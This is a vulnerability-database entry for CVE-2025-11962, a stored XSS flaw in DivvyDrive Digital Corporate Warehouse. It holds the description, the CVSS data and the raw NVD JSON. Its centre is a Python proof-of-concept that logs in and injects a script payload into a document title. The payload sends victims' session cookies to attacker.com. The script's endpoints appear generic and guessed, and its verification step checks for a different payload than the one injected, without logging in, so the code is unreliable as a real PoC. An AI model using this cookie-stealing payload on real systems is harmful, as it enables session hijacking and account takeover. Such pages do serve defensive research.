Security Vulnerability Report
中文
CVE-2025-11962 CVSS 7.3 HIGH

CVE-2025-11962

Published: 2025-11-12 10:15:43
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in DivvyDrive Information Technologies Inc. Digital Corporate Warehouse allows Stored XSS.This issue affects Digital Corporate Warehouse: before v.4.8.2.22.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Digital Corporate Warehouse < v4.8.2.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2025-11962 PoC - Stored XSS in DivvyDrive Digital Corporate Warehouse # Target: Digital Corporate Warehouse < v4.8.2.22 TARGET_URL = "http://target.com/divvydrive" USERNAME = "[email protected]" PASSWORD = "password123" def exploit_stored_xss(): """ PoC for CVE-2025-11962: Stored XSS vulnerability This script demonstrates how the XSS payload is stored and executed """ session = requests.Session() # Step 1: Login to the application login_data = { 'email': USERNAME, 'password': PASSWORD } response = session.post(f"{TARGET_URL}/login", data=login_data) if response.status_code != 200: print("[-] Login failed") return False print("[+] Login successful") # Step 2: Inject stored XSS payload # Common injection points: document title, file name, description fields xss_payload = "<script>document.location='http://attacker.com/steal?c='+document.cookie</script>" # Payload injection via vulnerable parameter inject_data = { 'title': xss_payload, 'description': 'Malicious content', 'category': 'documents' } response = session.post(f"{TARGET_URL}/api/documents/create", data=inject_data) if response.status_code == 200: print("[+] XSS payload injected successfully") print(f"[+] Payload: {xss_payload}") return True else: print("[-] Injection failed") return False def verify_vulnerability(): """ Verify the XSS is stored and reflected without sanitization """ session = requests.Session() # Check if payload is reflected without encoding response = session.get(f"{TARGET_URL}/documents/list") xss_payload = "<script>alert('XSS')</script>" if xss_payload in response.text: print("[+] Vulnerability confirmed - XSS payload not sanitized") return True else: print("[-] Payload not found or sanitized") return False if __name__ == "__main__": print("=" * 50) print("CVE-2025-11962 PoC - Stored XSS") print("Target: DivvyDrive Digital Corporate Warehouse") print("=" * 50) exploit_stored_xss() verify_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11962", "sourceIdentifier": "[email protected]", "published": "2025-11-12T10:15:42.880", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in DivvyDrive Information Technologies Inc. Digital Corporate Warehouse allows Stored XSS.This issue affects Digital Corporate Warehouse: before v.4.8.2.22."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0393", "source": "[email protected]"}]}}